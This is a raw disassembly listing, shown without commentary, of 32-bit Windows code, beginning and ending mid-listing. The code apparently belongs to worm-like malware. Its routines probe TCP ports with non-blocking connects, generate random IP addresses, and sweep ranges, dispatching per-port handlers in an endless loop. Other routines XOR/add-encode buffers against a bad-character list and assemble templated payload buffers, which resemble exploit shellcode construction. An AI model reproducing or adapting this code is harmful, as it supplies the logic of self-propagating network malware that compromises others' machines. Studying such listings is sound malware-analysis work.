mov [eax], esi
mov [eax+4], esi
mov [eax+8], esi
jbe loc_413920
loc_4137DA: ; CODE XREF: sub_4137AA+146�j
mov edx, [eax]
mov ebx, [eax+4]
mov esi, eax
lea edi, [ebp+var_10]
movsd
movsd
movsd
mov ecx, edx
shr ecx, 1Fh
lea edi, [edx+edx]
lea edx, [ebx+ebx]
or edx, ecx
mov ecx, [eax+8]
mov esi, ebx
shr esi, 1Fh
add ecx, ecx
or ecx, esi
mov [ebp+var_14], edi
mov esi, edi
and [ebp+var_14], 0
mov ebx, edx
shr ebx, 1Fh
add ecx, ecx
shr edi, 1Fh
or ecx, ebx
mov ebx, [ebp+var_10]
add esi, esi
add edx, edx
or edx, edi
lea edi, [esi+ebx]
cmp edi, esi
mov [eax], esi
mov [eax+4], edx
mov [eax+8], ecx
jb short loc_413831
cmp edi, ebx
jnb short loc_413838
loc_413831: ; CODE XREF: sub_4137AA+81�j
mov [ebp+var_14], 1
loc_413838: ; CODE XREF: sub_4137AA+85�j
xor ebx, ebx
cmp [ebp+var_14], ebx
mov [eax], edi
jz short loc_41385B
lea esi, [edx+1]
cmp esi, edx
jb short loc_41384D
cmp esi, 1
jnb short loc_413850
loc_41384D: ; CODE XREF: sub_4137AA+9C�j
xor ebx, ebx
inc ebx
loc_413850: ; CODE XREF: sub_4137AA+A1�j
test ebx, ebx
mov [eax+4], esi
jz short loc_41385B
inc ecx
mov [eax+8], ecx
loc_41385B: ; CODE XREF: sub_4137AA+95�j
; sub_4137AA+AB�j
mov ecx, [eax+4]
mov edx, [ebp+var_C]
lea ebx, [ecx+edx]
xor esi, esi
cmp ebx, ecx
jb short loc_41386E
cmp ebx, edx
jnb short loc_413871
loc_41386E: ; CODE XREF: sub_4137AA+BE�j
xor esi, esi
inc esi
loc_413871: ; CODE XREF: sub_4137AA+C2�j
test esi, esi
mov [eax+4], ebx
jz short loc_41387B
inc dword ptr [eax+8]
loc_41387B: ; CODE XREF: sub_4137AA+CC�j
mov ecx, [ebp+var_8]
add [eax+8], ecx
and [ebp+var_14], 0
lea ecx, [edi+edi]
mov edx, edi
shr edx, 1Fh
lea edi, [ebx+ebx]
or edi, edx
mov edx, [eax+8]
mov esi, ebx
shr esi, 1Fh
lea ebx, [edx+edx]
mov edx, [ebp+arg_0]
or ebx, esi
mov [eax], ecx
mov [eax+4], edi
mov [eax+8], ebx
movsx edx, byte ptr [edx]
lea esi, [ecx+edx]
cmp esi, ecx
mov [ebp+var_10], edx
jb short loc_4138BB
cmp esi, edx
jnb short loc_4138C2
loc_4138BB: ; CODE XREF: sub_4137AA+10B�j
mov [ebp+var_14], 1
loc_4138C2: ; CODE XREF: sub_4137AA+10F�j
cmp [ebp+var_14], 0
mov [eax], esi
jz short loc_4138E6
lea ecx, [edi+1]
xor edx, edx
cmp ecx, edi
jb short loc_4138D8
cmp ecx, 1
jnb short loc_4138DB
loc_4138D8: ; CODE XREF: sub_4137AA+127�j
xor edx, edx
inc edx
loc_4138DB: ; CODE XREF: sub_4137AA+12C�j
test edx, edx
mov [eax+4], ecx
jz short loc_4138E6
inc ebx
mov [eax+8], ebx
loc_4138E6: ; CODE XREF: sub_4137AA+11E�j
; sub_4137AA+136�j
dec [ebp+arg_4]
inc [ebp+arg_0]
cmp [ebp+arg_4], 0
ja loc_4137DA
xor esi, esi
jmp short loc_413920
; ---------------------------------------------------------------------------
loc_4138FA: ; CODE XREF: sub_4137AA+179�j
mov ecx, [eax+4]
mov edx, ecx
shr edx, 10h
mov [eax+8], edx
mov edx, [eax]
mov edi, edx
shl ecx, 10h
shr edi, 10h
or ecx, edi
shl edx, 10h
add [ebp+var_18], 0FFF0h
mov [eax+4], ecx
mov [eax], edx
loc_413920: ; CODE XREF: sub_4137AA+2A�j
; sub_4137AA+14E�j
cmp [eax+8], esi
jz short loc_4138FA
mov ebx, 8000h
test [eax+8], ebx
jnz short loc_41395F
loc_41392F: ; CODE XREF: sub_4137AA+1B3�j
mov esi, [eax]
mov edi, [eax+4]
add [ebp+var_18], 0FFFFh
mov ecx, esi
add esi, esi
shr ecx, 1Fh
mov [eax], esi
lea esi, [edi+edi]
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
shr edx, 1Fh
add ecx, ecx
or ecx, edx
test ecx, ebx
mov [eax+4], esi
mov [eax+8], ecx
jz short loc_41392F
loc_41395F: ; CODE XREF: sub_4137AA+183�j
mov cx, word ptr [ebp+var_18]
mov [eax+0Ah], cx
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4137AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_413976 proc near ; CODE XREF: sub_40423C+24�p
; sub_4086EA+10�p ...
jmp ds:dword_41D1B0
sub_413976 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41397C proc near ; CODE XREF: .kSjx934:00413B78�p
; .kSjx934:00413C9E�p ...
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 128h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
xor edi, edi
push 6
inc edi
push edi
push 2
mov [ebp+var_18], edi
call ds:dword_41D27C
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4139AD
xor al, al
jmp short loc_413A1F
; ---------------------------------------------------------------------------
loc_4139AD: ; CODE XREF: sub_41397C+2B�j
push [ebp+arg_4]
call ds:dword_41D278
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push esi
mov [ebp+var_14], 2
call ds:dword_41D268
and [ebp+var_1C], 0
push 10h
lea eax, [ebp+var_14]
push eax
push esi
mov [ebp+var_20], 5
mov [ebp+var_124], esi
mov [ebp+var_128], edi
call ds:dword_41D240
lea eax, [ebp+var_20]
push eax
push 0
lea eax, [ebp+var_128]
push eax
push 0
push 0
call ds:dword_41D258
push esi
mov edi, eax
call ds:dword_41D224
test edi, edi
setnle al
loc_413A1F: ; CODE XREF: sub_41397C+2F�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_41397C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 25Ch
mov eax, ds:dword_423064
xor eax, esp
mov [esp+258h], eax
push ebx
push esi
mov esi, [ebp+8]
push edi
push 49h
pop ecx
lea edi, [esp+138h]
rep movsd
loc_413A59: ; CODE XREF: .kSjx934:00413F71�j
; .kSjx934:00413F82�j
lea eax, [esp+18h]
push eax
lea eax, [esp+18h]
push eax
lea eax, [esp+18h]
push eax
lea eax, [esp+18h]
push eax
or edi, 0FFFFFFFFh
lea eax, [esp+248h]
push offset dword_41EEFC
push eax
mov [esp+24h], edi
mov [esp+28h], edi
mov [esp+2Ch], edi
mov [esp+30h], edi
call sub_4035E4
add esp, 18h
cmp byte ptr [esp+24Ah], 0
jz short loc_413AE7
cmp [esp+0Ch], edi
mov esi, 0FEh
jnz short loc_413AB7
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+0Ch], eax
loc_413AB7: ; CODE XREF: .kSjx934:00413AA8�j
cmp [esp+10h], edi
jnz short loc_413ACA
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+10h], eax
loc_413ACA: ; CODE XREF: .kSjx934:00413ABB�j
cmp [esp+14h], edi
jnz short loc_413ADD
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+14h], eax
loc_413ADD: ; CODE XREF: .kSjx934:00413ACE�j
mov eax, [esp+18h]
cmp eax, edi
jnz short loc_413B39
jmp short loc_413B12
; ---------------------------------------------------------------------------
loc_413AE7: ; CODE XREF: .kSjx934:00413A9D�j
mov eax, [esp+250h]
sub eax, 0
jz short loc_413B21
dec eax
jz short loc_413B00
dec eax
jnz short loc_413B35
mov eax, 0FEh
jmp short loc_413B14
; ---------------------------------------------------------------------------
loc_413B00: ; CODE XREF: .kSjx934:00413AF4�j
mov esi, 0FEh
loc_413B05: ; CODE XREF: .kSjx934:00413B33�j
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+14h], eax
loc_413B12: ; CODE XREF: .kSjx934:00413AE5�j
mov eax, esi
loc_413B14: ; CODE XREF: .kSjx934:00413AFE�j
xor ebx, ebx
call sub_4192C7
mov [esp+18h], eax
jmp short loc_413B39
; ---------------------------------------------------------------------------
loc_413B21: ; CODE XREF: .kSjx934:00413AF1�j
mov esi, 0FEh
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+10h], eax
jmp short loc_413B05
; ---------------------------------------------------------------------------
loc_413B35: ; CODE XREF: .kSjx934:00413AF7�j
mov eax, [esp+18h]
loc_413B39: ; CODE XREF: .kSjx934:00413AE3�j
; .kSjx934:00413B1F�j
shl eax, 8
add eax, [esp+14h]
shl eax, 8
add eax, [esp+10h]
shl eax, 8
add eax, [esp+0Ch]
mov [esp+254h], eax
mov eax, [esp+24Ch]
cmp eax, edi
jnz loc_413D78
xor ebx, ebx
mov [esp+20h], ebx
mov eax, offset dword_424548
loc_413B6F: ; CODE XREF: .kSjx934:00413B96�j
push dword ptr [eax]
push dword ptr [esp+258h]
call sub_41397C
test al, al
pop ecx
pop ecx
jnz short loc_413B9D
inc ebx
mov eax, ebx
imul eax, 2Ch
lea eax, dword_424548[eax]
cmp dword ptr [eax], 0
mov [esp+20h], ebx
jnz short loc_413B6F
jmp loc_413F62
; ---------------------------------------------------------------------------
loc_413B9D: ; CODE XREF: .kSjx934:00413B81�j
push 110h
lea eax, [esp+2Ch]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+138h]
push eax
push offset byte_41EF08
lea eax, [esp+30h]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+38h]
add esp, 10h
lea esi, [eax+1]
loc_413BD7: ; CODE XREF: .kSjx934:00413BDC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413BD7
sub eax, esi
mov [esp+eax+28h], cl
mov eax, [esp+254h]
mov [esp+128h], ebx
imul ebx, 2Ch
mov [esp+12Ch], eax
mov eax, ds:dword_424548[ebx]
mov [esp+130h], eax
mov al, [esp+248h]
sub esp, 110h
mov [esp+244h], al
mov al, [esp+35Ah]
push 44h
pop ecx
mov [esp+245h], al
lea esi, [esp+138h]
mov edi, esp
rep movsd
call ds:off_424550[ebx]
mov esi, [esp+128h]
shl esi, 8
add esi, [esp+124h]
add esp, 110h
shl esi, 8
add esi, [esp+10h]
mov dword ptr [esp+1Ch], 100h
shl esi, 8
add esi, [esp+0Ch]
mov [esp+24h], esi
loc_413C70: ; CODE XREF: .kSjx934:00413D6D�j
mov eax, [esp+1Ch]
mov ecx, [esp+14h]
add eax, ecx
shl eax, 8
add eax, [esp+10h]
shl eax, 8
add eax, [esp+0Ch]
cmp eax, esi
mov [esp+254h], eax
jz loc_413D5D
push ds:dword_424548[ebx]
push eax
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413D5D
push 110h
lea eax, [esp+2Ch]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+138h]
push eax
push offset byte_41EF0C
lea eax, [esp+30h]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+38h]
add esp, 10h
lea esi, [eax+1]
loc_413CE7: ; CODE XREF: .kSjx934:00413CEC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413CE7
sub eax, esi
mov [esp+eax+28h], cl
mov eax, [esp+254h]
mov [esp+12Ch], eax
mov eax, [esp+20h]
mov [esp+128h], eax
mov eax, ds:dword_424548[ebx]
mov [esp+130h], eax
mov al, [esp+248h]
sub esp, 110h
mov [esp+244h], al
mov al, [esp+35Ah]
push 44h
pop ecx
mov [esp+245h], al
lea esi, [esp+138h]
mov edi, esp
rep movsd
call ds:off_424550[ebx]
mov esi, [esp+134h]
add esp, 110h
loc_413D5D: ; CODE XREF: .kSjx934:00413C91�j
; .kSjx934:00413CA7�j
add dword ptr [esp+1Ch], 100h
cmp dword ptr [esp+1Ch], 0FE00h
jle loc_413C70
jmp loc_413F5D
; ---------------------------------------------------------------------------
loc_413D78: ; CODE XREF: .kSjx934:00413B5E�j
imul eax, 2Ch
push ds:dword_424548[eax]
push dword ptr [esp+258h]
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413F62
push 110h
lea eax, [esp+2Ch]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+138h]
push eax
push offset dword_41EF10
lea eax, [esp+30h]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+38h]
add esp, 10h
lea ecx, [eax+1]
loc_413DD1: ; CODE XREF: .kSjx934:00413DD6�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_413DD1
sub eax, ecx
mov [esp+eax+28h], dl
mov eax, [esp+254h]
mov [esp+12Ch], eax
mov eax, [esp+24Ch]
mov [esp+128h], eax
imul eax, 2Ch
mov ecx, ds:dword_424548[eax]
mov [esp+130h], ecx
mov cl, [esp+248h]
sub esp, 110h
mov [esp+244h], cl
push 44h
pop ecx
lea esi, [esp+138h]
mov edi, esp
rep movsd
call ds:off_424550[eax]
mov ebx, [esp+128h]
shl ebx, 8
add ebx, [esp+124h]
add esp, 110h
shl ebx, 8
add ebx, [esp+10h]
mov dword ptr [esp+1Ch], 100h
shl ebx, 8
add ebx, [esp+0Ch]
loc_413E5F: ; CODE XREF: .kSjx934:00413F57�j
mov eax, [esp+1Ch]
mov ecx, [esp+14h]
add eax, ecx
shl eax, 8
add eax, [esp+10h]
shl eax, 8
add eax, [esp+0Ch]
cmp eax, ebx
mov [esp+254h], eax
jz loc_413F47
mov ecx, [esp+24Ch]
imul ecx, 2Ch
push ds:dword_424548[ecx]
push eax
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413F47
push 110h
lea eax, [esp+2Ch]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+138h]
push eax
push offset byte_41EF14
lea eax, [esp+30h]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+38h]
add esp, 10h
lea esi, [eax+1]
loc_413EE0: ; CODE XREF: .kSjx934:00413EE5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413EE0
sub eax, esi
mov [esp+eax+28h], cl
mov eax, [esp+254h]
mov [esp+12Ch], eax
mov eax, [esp+24Ch]
mov [esp+128h], eax
imul eax, 2Ch
mov ecx, ds:dword_424548[eax]
mov [esp+130h], ecx
mov cl, [esp+248h]
sub esp, 110h
mov [esp+244h], cl
push 44h
pop ecx
lea esi, [esp+138h]
mov edi, esp
rep movsd
call ds:off_424550[eax]
add esp, 110h
loc_413F47: ; CODE XREF: .kSjx934:00413E80�j
; .kSjx934:00413EA0�j
add dword ptr [esp+1Ch], 100h
cmp dword ptr [esp+1Ch], 0FE00h
jle loc_413E5F
loc_413F5D: ; CODE XREF: .kSjx934:00413D73�j
call sub_4192FB
loc_413F62: ; CODE XREF: .kSjx934:00413B98�j
; .kSjx934:00413D91�j
push 64h
call ds:dword_41D0FC
cmp ds:byte_4269C0, 0
jnz loc_413A59
push 2710h
call ds:dword_41D0FC
jmp loc_413A59
; ---------------------------------------------------------------------------
cmp dword ptr [eax+4], 0
setnz al
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F8F proc near ; CODE XREF: sub_414023+12�p
; sub_414042+5D�p
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
and dword ptr [ebx+4], 0
mov eax, ds:dword_433C4C
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, offset dword_433C48
push esi
push edi
mov [ebp+var_8], eax
mov [ebp+var_10], eax
loc_413FB0: ; CODE XREF: sub_413F8F+4C�j
mov eax, ds:dword_433C4C
lea edi, [ebp+var_10]
lea esi, [ebp+var_8]
mov [ebp+var_C], eax
call sub_40166F
test al, al
jz short loc_414018
call sub_40164F
mov ecx, [ebx]
cmp ecx, [eax+40h]
lea edi, [ebp+var_18]
jz short loc_413FDD
call sub_40168C
jmp short loc_413FB0
; ---------------------------------------------------------------------------
loc_413FDD: ; CODE XREF: sub_413F8F+45�j
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
lea esi, [ebp+var_10]
mov [ebp+var_C], eax
call sub_40168C
mov eax, [eax+4]
cmp eax, ds:dword_433C4C
jz short loc_414018
mov ecx, [eax+4]
mov edx, [eax]
mov [ecx], edx
mov ecx, [eax]
mov edx, [eax+4]
push eax
mov [ecx+4], edx
call sub_402F6D
dec ds:dword_433C50
pop ecx
loc_414018: ; CODE XREF: sub_413F8F+36�j
; sub_413F8F+6B�j
push ebx
call sub_402F6D
pop ecx
pop edi
pop esi
leave
retn
sub_413F8F endp
; =============== S U B R O U T I N E =======================================
sub_414023 proc near ; CODE XREF: sub_40243A+7C�p
; sub_419477+10B�p
push ebx
mov ebx, eax
push 0
push dword ptr [ebx+4]
call ds:dword_41D094
test eax, eax
jz short loc_41403E
call sub_413F8F
mov al, 1
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41403E: ; CODE XREF: sub_414023+10�j
xor al, al
pop ebx
retn
sub_414023 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414042 proc near ; CODE XREF: sub_419EA0+4D2�p
; .kSjx934:0041BB65�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 1Ch
mov eax, ds:dword_433C4C
mov eax, [eax]
push ebx
mov [esp+20h+var_14], eax
mov eax, offset dword_433C48
push esi
push edi
mov [esp+28h+var_18], eax
mov [esp+28h+var_10], eax
loc_414066: ; CODE XREF: sub_414042+54�j
mov eax, ds:dword_433C4C
lea edi, [esp+28h+var_10]
lea esi, [esp+28h+var_18]
mov [esp+28h+var_C], eax
call sub_40166F
test al, al
jz short loc_4140A4
call sub_40164F
mov ecx, [ebp+arg_0]
cmp ecx, [eax+40h]
jz short loc_414098
lea edi, [esp+28h+var_8]
call sub_40168C
jmp short loc_414066
; ---------------------------------------------------------------------------
loc_414098: ; CODE XREF: sub_414042+49�j
call sub_40164F
mov ebx, [eax]
call sub_413F8F
loc_4140A4: ; CODE XREF: sub_414042+3C�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_414042 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4140AB proc near ; CODE XREF: sub_40177B+246�p
; sub_4019F3+1F8�p ...
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 54h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push esi
push 0
push ecx
push eax
push 0
push 0
call ds:dword_41D110
test eax, eax
mov [esi+4], eax
jz short loc_414104
push edi
lea eax, [ebp+var_4B]
push 38h
push eax
call sub_402AEE
mov eax, [esi]
add esp, 0Ch
mov [ebp+var_10], eax
mov eax, ds:dword_433C4C
push eax
mov ecx, offset dword_433C48
push ecx
lea eax, [ebp+var_50]
push eax
mov [ebp+var_4C], 0
mov [ebp+var_50], esi
call sub_4016BA
loc_414104: ; CODE XREF: sub_4140AB+27�j
push 1
push dword ptr [esi+4]
call ds:dword_41D07C
mov ecx, [ebp+var_4]
xor ecx, ebp
mov eax, esi
call sub_402710
leave
retn 4
sub_4140AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41411F proc near ; CODE XREF: sub_41A5C1+1C7�p
; sub_41A5C1+1E1�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 1
push esi
push edi
mov [ebp+var_2], 1
mov [ebp+var_1], 0
jnz loc_414239
mov eax, [ebp+arg_8]
lea esi, [eax+18h]
and eax, 80000001h
mov [ebp+var_8], esi
jns short loc_41414E
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_41414E: ; CODE XREF: sub_41411F+28�j
jz short loc_414154
mov [ebp+var_1], 1
loc_414154: ; CODE XREF: sub_41411F:loc_41414E�j
mov eax, 172h
cmp esi, eax
jle short loc_414167
cmp [ebp+var_1], 1
jnz loc_414324
loc_414167: ; CODE XREF: sub_41411F+3C�j
lea ecx, [esi+1]
cmp ecx, eax
mov [ebp+var_C], ecx
jle short loc_414181
cmp [ebp+var_1], 1
jnz short loc_414181
jmp loc_414324
; ---------------------------------------------------------------------------
loc_41417C: ; CODE XREF: sub_41411F+ED�j
mov eax, 172h
loc_414181: ; CODE XREF: sub_41411F+50�j
; sub_41411F+56�j
inc [ebp+var_2]
and [ebp+arg_0], 0
push eax
push 0
push ebx
call sub_407B70
add esp, 0Ch
push 6
pop ecx
mov esi, offset dword_424894
mov edi, ebx
rep movsd
mov cl, [ebp+var_2]
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebx+0Eh], cl
mov [ebx+12h], cl
jle short loc_4141C8
loc_4141B0: ; CODE XREF: sub_41411F+A7�j
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov al, [esi+eax]
add al, cl
mov [ebx+esi+18h], al
inc esi
cmp esi, [ebp+arg_8]
mov [ebp+arg_0], esi
jl short loc_4141B0
loc_4141C8: ; CODE XREF: sub_41411F+8F�j
cmp [ebp+var_1], 1
jnz short loc_4141D5
mov eax, [ebp+arg_0]
mov [eax+ebx+18h], cl
loc_4141D5: ; CODE XREF: sub_41411F+AD�j
cmp [ebp+var_8], edi
mov byte ptr [ebp+arg_0+3], 1
jle short loc_414217
loc_4141DE: ; CODE XREF: sub_41411F+E2�j
mov dl, [edi+ebx]
xor esi, esi
loc_4141E3: ; CODE XREF: sub_41411F+D0�j
mov eax, [ebp+arg_C]
cmp dl, [esi+eax]
jz short loc_4141F3
inc esi
cmp esi, 8
jl short loc_4141E3
jmp short loc_4141F7
; ---------------------------------------------------------------------------
loc_4141F3: ; CODE XREF: sub_41411F+CA�j
mov byte ptr [ebp+arg_0+3], 0
loc_4141F7: ; CODE XREF: sub_41411F+D2�j
cmp byte ptr [ebp+arg_0+3], 0
jz short loc_414203
inc edi
cmp edi, [ebp+var_8]
jl short loc_4141DE
loc_414203: ; CODE XREF: sub_41411F+DC�j
cmp byte ptr [ebp+arg_0+3], 1
jz short loc_414217
cmp cl, 0FFh
jb loc_41417C
jmp loc_414324
; ---------------------------------------------------------------------------
loc_414217: ; CODE XREF: sub_41411F+BD�j
; sub_41411F+E8�j ...
cmp [ebp+var_1], 1
jnz short loc_414226
mov eax, [ebp+var_C]
inc [ebp+arg_8]
mov [ebp+var_8], eax
loc_414226: ; CODE XREF: sub_41411F+FC�j
mov eax, [ebp+arg_8]
cdq
sub eax, edx
sar eax, 1
mov [ebx+3], al
mov eax, [ebp+var_8]
jmp loc_414326
; ---------------------------------------------------------------------------
loc_414239: ; CODE XREF: sub_41411F+14�j
cmp [ebp+arg_0], 2
jnz loc_414324
mov eax, [ebp+arg_8]
lea esi, [eax+18h]
and eax, 80000001h
mov [ebp+var_8], esi
jns short loc_414258
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_414258: ; CODE XREF: sub_41411F+132�j
jz short loc_41425E
mov [ebp+var_1], 1
loc_41425E: ; CODE XREF: sub_41411F:loc_414258�j
mov eax, 172h
cmp esi, eax
jle short loc_414271
cmp [ebp+var_1], 1
jnz loc_414324
loc_414271: ; CODE XREF: sub_41411F+146�j
lea ecx, [esi+1]
cmp ecx, eax
mov [ebp+var_C], ecx
jle short loc_41428B
cmp [ebp+var_1], 1
jnz short loc_41428B
jmp loc_414324
; ---------------------------------------------------------------------------
loc_414286: ; CODE XREF: sub_41411F+1FF�j
mov eax, 172h
loc_41428B: ; CODE XREF: sub_41411F+15A�j
; sub_41411F+160�j
inc [ebp+var_2]
and [ebp+arg_0], 0
push eax
push 0
push ebx
call sub_407B70
add esp, 0Ch
push 6
pop ecx
mov esi, offset dword_4248B0
mov edi, ebx
rep movsd
mov cl, [ebp+var_2]
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebx+0Eh], cl
mov [ebx+12h], cl
jle short loc_4142D2
loc_4142BA: ; CODE XREF: sub_41411F+1B1�j
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov al, [esi+eax]
xor al, cl
mov [ebx+esi+18h], al
inc esi
cmp esi, [ebp+arg_8]
mov [ebp+arg_0], esi
jl short loc_4142BA
loc_4142D2: ; CODE XREF: sub_41411F+199�j
cmp [ebp+var_1], 1
jnz short loc_4142DF
mov eax, [ebp+arg_0]
mov [eax+ebx+18h], cl
loc_4142DF: ; CODE XREF: sub_41411F+1B7�j
cmp [ebp+var_8], edi
mov byte ptr [ebp+arg_0+3], 1
jle loc_414217
loc_4142EC: ; CODE XREF: sub_41411F+1F0�j
mov dl, [edi+ebx]
xor esi, esi
loc_4142F1: ; CODE XREF: sub_41411F+1DE�j
mov eax, [ebp+arg_C]
cmp dl, [esi+eax]
jz short loc_414301
inc esi
cmp esi, 8
jl short loc_4142F1
jmp short loc_414305
; ---------------------------------------------------------------------------
loc_414301: ; CODE XREF: sub_41411F+1D8�j
mov byte ptr [ebp+arg_0+3], 0
loc_414305: ; CODE XREF: sub_41411F+1E0�j
cmp byte ptr [ebp+arg_0+3], 0
jz short loc_414311
inc edi
cmp edi, [ebp+var_8]
jl short loc_4142EC
loc_414311: ; CODE XREF: sub_41411F+1EA�j
cmp byte ptr [ebp+arg_0+3], 1
jz loc_414217
cmp cl, 0FFh
jb loc_414286
loc_414324: ; CODE XREF: sub_41411F+42�j
; sub_41411F+58�j ...
xor eax, eax
loc_414326: ; CODE XREF: sub_41411F+115�j
pop edi
pop esi
leave
retn
sub_41411F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41432A proc near ; CODE XREF: sub_41A5C1+19F�p
; sub_41A9DE+490�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
lea edx, [eax+1]
loc_414333: ; CODE XREF: sub_41432A+E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_414333
sub eax, edx
push ebx
lea ebx, [eax+0CCh]
cmp ebx, 172h
jg short loc_414393
push esi
push edi
mov edi, [ebp+arg_0]
push ebx
push 0
push edi
call sub_407B70
mov eax, [ebp+arg_4]
add esp, 0Ch
push 32h
pop ecx
mov esi, offset dword_4248D0
rep movsd
movsw
movsb
lea esi, [eax+1]
loc_41436F: ; CODE XREF: sub_41432A+4A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41436F
sub eax, esi
push eax
mov eax, [ebp+arg_0]
push [ebp+arg_4]
add eax, 0CAh
push eax
call sub_407BF0
add esp, 0Ch
pop edi
mov eax, ebx
pop esi
jmp short loc_414395
; ---------------------------------------------------------------------------
loc_414393: ; CODE XREF: sub_41432A+1F�j
xor eax, eax
loc_414395: ; CODE XREF: sub_41432A+67�j
pop ebx
pop ebp
retn
sub_41432A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4143A0 proc near ; CODE XREF: sub_41B7F9+64�p
xor ecx, ecx
push esi
push edi
mov [eax+8], ecx
mov [eax+0Ch], ecx
mov [eax], ecx
mov [eax+4], ecx
lea edi, [eax+10h]
mov ecx, 10h
mov esi, offset dword_41FE50
rep movsd
pop edi
pop esi
retn
sub_4143A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4143D0 proc near ; CODE XREF: sub_416AE0+BE�p
; sub_416AE0+13B�p ...
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
